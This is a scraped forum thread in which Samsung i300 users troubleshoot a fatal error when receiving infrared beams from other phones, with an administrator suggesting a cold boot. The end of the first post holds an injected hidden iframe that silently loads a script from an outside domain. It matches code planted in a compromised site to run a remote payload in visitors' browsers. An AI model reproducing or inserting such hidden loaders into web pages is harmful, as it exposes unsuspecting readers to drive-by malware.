+ Reply to Thread

Thread: Beaming Crash?

Thumbs down Beaming Crash?

when someone sends me there number via ir, it says' beaming, waiting', then i get a fatal error and must reboot. I can send my number no problem
    my hacks:
    graffiti
    logo
    picture id
    speaker phone
    techsounds
    hackbroom
    x-master
    anyone else have this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had the same problem even when running no hacks.

Administrator

Arrow

did you do a cold boot and then try the beam without doing the hotsync? (meaning, reset the phone to factory stats and try it).

Originally posted by Marctronixx
    did you do a cold boot and then try the beam without doing the hotsync? (meaning, reset the phone to factory stats and try it).
    No i did not. But anyway it doesn't really matter to me. Just thought I'd share that the same thing happened to me.

Administrator

Arrow

this question was referred to the original poster of this thread.

no i did not. Its not very often that i come across someone else with a beaming function on their phone, only the latest phones have it and almost all of those people dont even know it nor how to use it.
    but are u refering that I press the reset button on the back of the phone and then press 'up' to erase all data when prompted? Then if a 'beam receive' is successful one would determine that my additional software is the culprit? ---this is what i figured since i have so many hacks. though now the above poster admits same problem with normal software, so anyone else have this problem?

Administrator

Arrow

i would still try it. we dont know what the other poster has on his phone. and besides , you have 4.1 desktop so you wont lose anything when you do the cold boot. so its worth a try IMO...

i have heard some folks get an error when someone beamed something from a nokia phone to the 300...

got a fatel error receiving a beam from a 'compaq ipaq' with pocket pc.
    i will try another tonight

same error with the voicestream ericson phone (the new one with color screen and a joystick)

Administrator

Arrow

did you do a cold boot to return the phone back to factory stats whist doing these "tests"...?

it could be that the i300 simply cant receive info from these phones...

no, didnt do a cold boot. Though, hypothetically speaking, if i did a cold boot and I successfully received a business card beam, what do you suggest then?

as for your other thought...In my opinion, I think the i300 can receive info from these phones and most likely the vast mahority if not all phone. I say this because:
    1. I can send it no problem which means both phones speak the same language
    2. When receiving it say 'receiving' meaning communication is established and as if everything is working probably.
    3. IR beaming is pretty much a standard protocol, it would be pretty useless if only samsung phones could communicate with each other only, and nokia to nokia likewise. It wouldnt be worth the cost to build phones that way. And just by some strange coincidence one can talk across a platform but not listen.
    4. palms have been IR beaming for years and pretty much IS the standard,just because there is a phone integrated into this one, should have any affect
    JMHO